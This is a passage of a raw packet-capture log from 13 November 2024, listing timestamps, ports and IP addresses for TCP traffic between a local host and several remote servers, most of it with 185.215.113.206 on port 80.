Nov 13, 2024 20:39:47.880747080 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.880757093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.880913973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880928040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880942106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.880945921 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.880990028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.899749994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899770975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899785995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899821043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.899847984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.899852037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899876118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899889946 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.899890900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899904966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.899912119 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.899933100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.900408983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.900445938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.900537968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.900551081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.900583029 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.900598049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.900738955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.900753975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.900768995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.900798082 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.900814056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.901156902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.901177883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.901192904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.901195049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.901210070 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.901225090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.926927090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.926964998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.926976919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.926985025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927021980 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927021980 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927026987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.927042007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.927056074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.927057028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927069902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927083969 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927416086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.927438021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.927453041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.927453041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927469015 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.927483082 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.964848042 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.964917898 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.966065884 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.966080904 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.966128111 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.966231108 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.967515945 CET	49925	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.967531919 CET	443	49925	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.967658043 CET	49924	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:47.967679977 CET	443	49924	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:47.970822096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.970840931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.970855951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.970891953 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.970932961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.997715950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.997754097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.997769117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.997792006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.997823000 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.997880936 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.997895956 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.997922897 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.997999907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.998013973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.998035908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.998056889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.998094082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.998146057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.016906977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017005920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017018080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017034054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017046928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017066956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.017117023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.017153978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017199993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017214060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017232895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.017251968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.017252922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017270088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017287016 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.017302036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.017934084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017960072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017972946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.017987013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.018001080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.018006086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.018042088 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.043992996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044023037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044035912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044059038 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.044085979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.044248104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044265032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044281960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.044306040 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.044378996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044398069 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044409037 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.044411898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.044425964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.044440031 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.087987900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.088011980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.088027000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.088057995 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.088100910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.114758015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.114784956 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.114799976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.114824057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.114864111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.114892960 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.114906073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.114928961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.114962101 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.115138054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.115150928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.115165949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.115179062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.115199089 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.144938946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.144958019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.144969940 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.144984961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.144989014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.144995928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145009041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145018101 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.145023108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145045042 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.145062923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.145406008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145425081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145440102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145453930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145468950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145473003 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.145483017 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145493984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.145497084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.145515919 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.145533085 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.146408081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.146476030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.146488905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.146517992 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.152837992 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.152858973 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.153000116 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.153852940 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.153870106 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.154138088 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.154170036 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.154189110 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.154232025 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.154653072 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.154697895 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.154756069 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.154856920 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.154866934 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.155030966 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.155041933 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.155050993 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.155086040 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.156647921 CET	49926	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.156663895 CET	443	49926	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.156757116 CET	49927	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.156770945 CET	443	49927	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.156857967 CET	49928	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.156883001 CET	443	49928	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.156949043 CET	49929	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.156970978 CET	443	49929	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.157044888 CET	49930	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.157062054 CET	443	49930	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.157135963 CET	49931	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:48.157146931 CET	443	49931	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:48.161019087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161056042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161067009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161084890 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.161114931 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.161154985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161165953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161196947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.161212921 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.161448002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161472082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161482096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.161566019 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.205020905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.205039978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.205049992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.205082893 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.205117941 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.232027054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232042074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232050896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232060909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232070923 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232081890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232083082 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.232093096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232110977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.232140064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.232434034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.232511044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.251013994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251046896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251058102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251076937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251099110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.251117945 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.251250982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251261950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251271009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251285076 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.251298904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.251352072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251362085 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251373053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.251394033 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.251415014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.261938095 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.261965990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.261977911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.261989117 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.262016058 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.262067080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.262078047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.262089968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.262100935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.262101889 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.262130976 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.262132883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.262203932 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.278117895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278137922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278150082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278181076 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.278189898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278215885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.278238058 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.278369904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278381109 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278390884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278402090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.278409958 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.278424025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.278445959 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.311968088 CET	443	49921	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.312334061 CET	49921	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.312350988 CET	443	49921	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.313472986 CET	443	49921	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.314255953 CET	49921	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.314444065 CET	443	49921	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.322432041 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.322457075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.322469950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.322480917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.322508097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.322542906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.337090969 CET	443	49920	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.337331057 CET	49920	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.337352037 CET	443	49920	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.337807894 CET	443	49920	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.338395119 CET	49920	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.338479996 CET	443	49920	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:48.349287033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349322081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349334955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349371910 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.349405050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.349565983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349582911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349595070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349602938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.349608898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349621058 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.349631071 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.349668980 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.357539892 CET	49921	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.368191004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368212938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368226051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368257999 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.368304014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.368307114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368319035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368330002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368339062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.368357897 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.368752956 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368762970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368774891 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368784904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368797064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.368803024 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.368838072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.379550934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379573107 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379590034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379601002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379610062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.379611969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379631042 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.379650116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.379911900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379920959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379930019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.379947901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.379968882 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.383037090 CET	49920	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:48.396034002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396081924 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:48.396106958 CET	443	49919	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:48.396126986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396138906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396151066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396162987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:48.396169901 CET	49873	80	192.168.2.5	185.215.113.206
